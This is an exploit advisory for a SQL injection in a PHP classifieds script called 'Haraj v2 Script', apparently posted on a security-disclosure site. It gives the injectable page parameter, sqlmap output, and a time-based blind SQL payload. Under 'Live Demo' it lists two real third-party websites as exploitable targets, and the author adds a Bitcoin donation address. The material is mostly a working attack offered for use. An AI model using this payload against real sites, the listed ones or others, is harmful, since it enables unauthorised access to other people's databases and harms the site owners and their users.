Haraj v2 Script SQL injection Vulnerability

2017.01.16
mr xBADGIRL21 (MR) mr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

|----------------------------| | [xBADGIRL21] | | [N3W PUBLIC 3XPL0IT] | | _,________ | | 0day _T _==____() -- | | /##(_)-' | | /##/ | | x21 | |----------------------------| | Exploit Title : Haraj v2 Script SQL injection Vulnerability | Exploit Author : xBADGIRL21 | Dork : N/A in PUBLISH VERSION | version : ALL | Tested on: [ WINDOWS] | MyBlog : http://xbadgirl21.blogspot.com/ | Date: 16/01/2017 | video Proof : | To buy or Danate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz |-------------------- | [+] Poc : | |-------------------- | [page] Get Parameter Vulnerable To SQLi | http://127.0.0.1/page.php?page=[SQLi] |-------------------- | [+] SQLmap PoC: | |-------------------- |GET parameter 'page_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N |sqlmap identified the following injection point(s) with a total of 119 HTTP(s) requests: |--- |Parameter: page_id (GET) | Type: AND/OR time-based blind | Title: MySQL >= 5.0.12 AND time-based blind | Payload: page_id=3' AND SLEEP(5) AND 'ayuU'='ayuU |--- |[INFO] the back-end DBMS is MySQL |web application technology: Apache 2.4.16, PHP 5.6.16 |back-end DBMS: MySQL >= 5.0.12 |-------------------- | [!] Live Demo : | |-------------------- |1) http://www.hraj-cars.com/page.php?page=1 |2) http://tiger-realestate.com/page.php?page_id=3 |----------------------------------------------- | Discovered by : xBADGIRL21 | | Greetz : All Mauritanien Hackers - NoWhere | +----------------------------------------------+


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top